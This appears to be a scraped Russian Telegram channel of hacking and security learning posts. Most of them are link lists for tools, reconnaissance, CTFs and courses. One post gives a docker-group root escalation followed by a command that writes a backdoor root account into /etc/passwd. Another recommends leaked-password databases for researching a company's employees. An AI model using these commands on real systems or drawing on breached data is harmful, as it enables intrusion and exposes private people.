#begin #hacking
Начнем с основ, которые рекомендуются новичкам.
Новичков буду направлять на данный пост за ознакомлением с простейшими технологиями и инструментами, которые встречаются при анализе защищенности.
Linux/Bash:
Курс по основам Линукс - https://stepik.org/course/Введение-в-Linux-73
Web:
Простым языком об HTTP - https://habrahabr.ru/post/215117/
Burp Suite (Инструмент для анализа защищенности веб-приложений):
https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA
Networking:
Wireshark (Инструмент для анализа сетевого трафика) - https://habr.com/post/204274/
Exploits:
Основы Metasploit (Инструмент для поиска и разработки эксплойтов) - https://habrahabr.ru/post/234719/
Programming:
Ознакомление с Python, одним из популярнейших языков программирования среди сообщества хакеров - https://stepik.org/course/512
Статья будет пополняться и изменяться с появлением полезных идей.
Начнем с основ, которые рекомендуются новичкам.
Новичков буду направлять на данный пост за ознакомлением с простейшими технологиями и инструментами, которые встречаются при анализе защищенности.
Linux/Bash:
Курс по основам Линукс - https://stepik.org/course/Введение-в-Linux-73
Web:
Простым языком об HTTP - https://habrahabr.ru/post/215117/
Burp Suite (Инструмент для анализа защищенности веб-приложений):
https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA
Networking:
Wireshark (Инструмент для анализа сетевого трафика) - https://habr.com/post/204274/
Exploits:
Основы Metasploit (Инструмент для поиска и разработки эксплойтов) - https://habrahabr.ru/post/234719/
Programming:
Ознакомление с Python, одним из популярнейших языков программирования среди сообщества хакеров - https://stepik.org/course/512
Статья будет пополняться и изменяться с появлением полезных идей.
Stepik: online education
Введение в Linux
Курс знакомит слушателей с операционной системой Linux и основами её использования. В рамках курса мы покажем как установить Linux на ваш компьютер, расскажем о программах в нем, поработаем в терминале, зайдем на удаленный сервер и рассмотрим еще несколько…
#basic #http
К основам веб-технологий добавляются основы технологий веб-безопасности:
https://habr.com/company/ruvds/blog/421347/
К основам веб-технологий добавляются основы технологий веб-безопасности:
https://habr.com/company/ruvds/blog/421347/
Habr
CORS, CSP, HTTPS, HSTS: о технологиях веб-безопасности
Автор материала, перевод которого мы публикуем сегодня, говорит, что существует множество причин изучать веб-безопасность. Например, вопросами безопасности интересуются пользователи веб-сайтов,...
#hacking #all
Всеобъемлющий репозиторий, содержащий разделы на все возможные темы связанные с хаккингом
https://github.com/rmusser01/Infosec_Reference
Всеобъемлющий репозиторий, содержащий разделы на все возможные темы связанные с хаккингом
https://github.com/rmusser01/Infosec_Reference
GitHub
GitHub - rmusser01/Infosec_Reference: An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference…
An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version. - rmusser01/Infosec_Reference
#hacking #osint #reconnaissance
Предлагаю для изучения небольшой мануал для проведения мероприятий по рекогносцировке в сети.
Разведка
Начальные условния:
* Имя компании;
* Доменное имя;
* IP адрес(а);
Цели:
1. Получить IP адреса принадлежщие компании
2. Получить доменные имена второго и третьего уровней принадлежащие компании
3. Собрать информацию об имеющихся публичных сервисах компании
4. Собрать информацию об используемых компанией технологиях
5. Собрать информацию о сотрудниках компании
Средства:
Шаги 1-2:
* host, nslookup, dig (Типы запросов: NS,ANY,TXT,AXFR,PTR...)
* whois (Получаем netblock и дополнительную информацию о принадлежности адреса какой-либо организации )
* Search engines:
- http://searchdns.netcraft.com/;
- https://www.shodan.io/host/;
- https://censys.io/
- https://community.riskiq.com/
- http://whois.webhosting.info/x.x.x.x
- http://google.com (inurl, site, filetype, cache, etc...)
* Recon-ng (All in the box)
* DNSrecon (DNS enumeration, revers lookup, scanning, whois recon)
* Amass (Very fast brute)
* subfinder (Brute and finding)
* Aquatone (Using pablic services like: shodan, censys, riskiq...)
Шаг 3:
* Shoodan.io (Информация о портах и сервисах)
* Nmap (Сканирование и поиск открытых портов)
* Eye-witness (Скриншоты интерфейсоф публичных сервисов)
* Web-Cache (Google Cache, Web Archive)
Шаг 4:
* Wappalyzer (Web анализ используемых технологий)
* BurpSuite (Проксируем трафик и используем VulnersDB плагин)
* Nmap (Ключ -sV - определение используемых версий ПО, -O - определение версий ОС)
* Наблюдение и опыт
Шаг 5:
* http://people.yandex.ru/ (Агрегированный посик людей в различных социальных сетях)
* http://vk.com, http://ok.ru, http://facebook.com (Социальные сети)
* TheHarvester, Z-Harvester (Поиск e-mail адресов в публичном доступе)
* Recon-ng (domains-contacts,companies-contacts, domains-creds)
* Leaked databases (http://databases.today/, http://snusbase.com/)
* FOCA (https://www.elevenpaths.com/labstools/foca/index.html) (Поиск документов различных форматов в веб-приложениях и публичных сервисах принадлжащих компании)
Дополнительно:
* http://osintframework.com/
Предлагаю для изучения небольшой мануал для проведения мероприятий по рекогносцировке в сети.
Разведка
Начальные условния:
* Имя компании;
* Доменное имя;
* IP адрес(а);
Цели:
1. Получить IP адреса принадлежщие компании
2. Получить доменные имена второго и третьего уровней принадлежащие компании
3. Собрать информацию об имеющихся публичных сервисах компании
4. Собрать информацию об используемых компанией технологиях
5. Собрать информацию о сотрудниках компании
Средства:
Шаги 1-2:
* host, nslookup, dig (Типы запросов: NS,ANY,TXT,AXFR,PTR...)
* whois (Получаем netblock и дополнительную информацию о принадлежности адреса какой-либо организации )
* Search engines:
- http://searchdns.netcraft.com/;
- https://www.shodan.io/host/;
- https://censys.io/
- https://community.riskiq.com/
- http://whois.webhosting.info/x.x.x.x
- http://google.com (inurl, site, filetype, cache, etc...)
* Recon-ng (All in the box)
* DNSrecon (DNS enumeration, revers lookup, scanning, whois recon)
* Amass (Very fast brute)
* subfinder (Brute and finding)
* Aquatone (Using pablic services like: shodan, censys, riskiq...)
Шаг 3:
* Shoodan.io (Информация о портах и сервисах)
* Nmap (Сканирование и поиск открытых портов)
* Eye-witness (Скриншоты интерфейсоф публичных сервисов)
* Web-Cache (Google Cache, Web Archive)
Шаг 4:
* Wappalyzer (Web анализ используемых технологий)
* BurpSuite (Проксируем трафик и используем VulnersDB плагин)
* Nmap (Ключ -sV - определение используемых версий ПО, -O - определение версий ОС)
* Наблюдение и опыт
Шаг 5:
* http://people.yandex.ru/ (Агрегированный посик людей в различных социальных сетях)
* http://vk.com, http://ok.ru, http://facebook.com (Социальные сети)
* TheHarvester, Z-Harvester (Поиск e-mail адресов в публичном доступе)
* Recon-ng (domains-contacts,companies-contacts, domains-creds)
* Leaked databases (http://databases.today/, http://snusbase.com/)
* FOCA (https://www.elevenpaths.com/labstools/foca/index.html) (Поиск документов различных форматов в веб-приложениях и публичных сервисах принадлжащих компании)
Дополнительно:
* http://osintframework.com/
Censys
Censys | The Authority for Internet Intelligence and Insights
Censys empowers security teams with the most comprehensive, accurate, and up-to-date map of the internet to defend attack surfaces and hunt for threats.
❤1
#hacking #mobileApp
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
sushi2k.gitbooks.io
Platform Overview · OWASP Mobile Security Testing Guide
#hacking #privilageEscalation
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
#hacking #macos
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
brew install sidaf/pentest/recon-ng
GitHub
GitHub - sidaf/homebrew-pentest: Homebrew Tap - Pen Test Tools
Homebrew Tap - Pen Test Tools. Contribute to sidaf/homebrew-pentest development by creating an account on GitHub.
#professional #hacking #windows #exploit
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Хабр
Опубликован эксплоит для незакрытой уязвимости в планировщике задач Windows (перевод)
Одним из исследователей безопасности была опубликована в Twitter информация об уязвимости в ОС Windows. Уязвимость заключается в эскалации привилегий на локал...
#hacking #mobileApp #professional
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
GitHub
MobileApp-Pentest-Cheatsheet/README.md at master · tanprathan/MobileApp-Pentest-Cheatsheet
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
#hacking #knowledge #tg
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира
Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира
Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
Telegram
ANTICHAT Channel
Официальный канал https://forum.antichat.club
#professional #hacking #LPE
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
Следующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
https://twitter.com/4lex/status/1035932897407115264
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
id показывает, что текущий пользователь принадлежит группе docker, значит существует возможность получить доступ к ОС от имени пользователя root командой:$ docker run -it --rm -v /:/mnt bashСледующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
# echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Ссылка на оригинал:https://twitter.com/4lex/status/1035932897407115264
Twitter
[audible]blink
You land on a computer and `id` shows you're part of the `docker` group. Escalate to root with: $> docker run -it --rm -v $PWD:/mnt bash adds backdoor toor:password #> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#hacking #web #professional
Интересное видео с конференции BlackHat2018 о том, как превращать данные кэша в эксплоиты.
Известные и некоторые новые подходы к атакам Web Cache Deception.
https://www.youtube.com/watch?v=j2RrmNxJZ5c&app=desktop
Интересное видео с конференции BlackHat2018 о том, как превращать данные кэша в эксплоиты.
Известные и некоторые новые подходы к атакам Web Cache Deception.
https://www.youtube.com/watch?v=j2RrmNxJZ5c&app=desktop
YouTube
Practical Web Cache Poisoning: Redefining 'Unexploitable'
Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone…
#hacking #ctf #beginners
Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
YouTube
Attack-Defense — приветственный стрим
Мы рассказали, как устроены CTF в формате атак-дефенса, и что будет на встречах SPbCTF в этом сезоне.
Регистрация на атак-дефенс: https://vk.cc/8sMEwH
Пост со ссылками и основными мыслями из стрима — в группе:
http://vk.com/wall-114366489_1420
Регистрация на атак-дефенс: https://vk.cc/8sMEwH
Пост со ссылками и основными мыслями из стрима — в группе:
http://vk.com/wall-114366489_1420
#research #books
Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.
Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.
Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
#hacking #professional #lpe
Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
#hacking #research #clientSide
Новая техника удержания жертвы на странице с рекламой, CSRF и прочим.
Смещаем курсор мыши с помощью CSS стиля, и жертва не может выйти со страницы из-за того, что попросту кликает не туда.
https://xakep.ru/2018/09/17/evil-cursor/
Новая техника удержания жертвы на странице с рекламой, CSRF и прочим.
Смещаем курсор мыши с помощью CSS стиля, и жертва не может выйти со страницы из-за того, что попросту кликает не туда.
https://xakep.ru/2018/09/17/evil-cursor/
«Хакер»
Мошенники из группировки Partnerstroka блокируют курсор пользователей Google Chrome
Исследователи Malwarebytes рассказали о мошеннической группе Partnerstroka, которая блокирует пользователей Google Chrome на сайтах фальшивой технической поддержки при помощи новой техники «злой курсор» (evil cursor).
#informationSecurity #cources #beginers
Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/
Ссылки на все вебинары:
1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.
2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.
3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.
4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.
5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/
Ссылки на все вебинары:
1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.
2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.
3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.
4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.
5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
Хабр
Be a security ninja: начни свой путь к вершинам ИБ
Информационная безопасность – одна из дисциплин, набирающих бешеную популярность в последние годы. Между тем, многих пугает порог вхождения, разрозненность зн...
#beginners #video #ctf
Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.
https://www.youtube.com/watch?v=RXgp4cDbiq4
Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.
https://www.youtube.com/watch?v=RXgp4cDbiq4
YouTube
DEF CON CTF 2018 Finals
Vlog about the Attack and Defense DEF CON 2018 CTF Finals in Las Vegas.
learn hacking (ad): https://hextree.io
-=[ ❤️ Support ]=-
→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join…
learn hacking (ad): https://hextree.io
-=[ ❤️ Support ]=-
→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join…
#events
15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)
Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/
К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)
Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/
К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
«Хакер»
OFFZONE 2018: никаких пиджаков, никакого бизнеса — только hardcore research
15-16 ноября 2018 года в Москве состоится международная конференция по кибербезопасности OFFZONE 2018. Мероприятие пройдет в центре Digital October и объединит на своей площадке экспертов, исследователей, участников профессионального сообщества и всех неравнодушных…
#hacking #beginners #professional #sqlInjection
Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.
https://sqlwiki.netspi.com/
Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.
https://sqlwiki.netspi.com/
Netspi
NetSPI SQL Injection Wiki
A one stop resource for fully identifying, exploiting, and escalating SQL injection vulnerabilities across various Database Management Systems.